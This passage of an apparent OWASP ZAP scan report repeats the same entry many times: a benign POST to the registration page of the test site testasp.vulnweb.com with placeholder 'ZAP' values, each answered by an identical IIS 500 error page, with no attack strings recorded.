| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
